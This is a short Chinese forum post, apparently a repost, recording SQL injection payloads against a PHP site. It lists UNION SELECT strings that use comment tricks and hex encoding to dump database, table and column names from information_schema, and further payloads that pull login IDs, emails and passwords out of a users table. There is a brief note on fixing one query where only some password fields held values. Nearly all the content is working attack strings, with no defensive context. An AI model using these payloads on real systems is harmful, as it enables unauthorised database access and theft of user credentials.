• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    php 注入 记录一下

    发布者: 涵韵 | 发布时间: 2025-6-27 15:41| 查看数: 23| 评论数: 0|帖子模式

    暴库名\表名\列名

    /**/union/**/select/**/unhex(hex(concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)))+FROM+information_sch
    ema.columns+WHERE+table_schema!=0x696e666f726d6174696f6e5f736368656d61+LIMIT+N,1--

    碰到一个字段暴不出来,问了下trace,找到了原因,是因为用户名字段是9个,但是密码字段只有4个是有值的,所以暴不出来,改了下语句可以了.

    union+select+count(pasd)+from+users--

    +union+select+concat(loginID,0x3a,email,0x3a,pasd)+from+users+where+length(pasd)>0+limit+N,1--

    或者冰的原点提供的

    /union/**/select/**/unhex(hex(group_concat(loginID,0x3a,pasd)))+FROM+users--


    来源:https://www.jb51.net/hack/12891.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表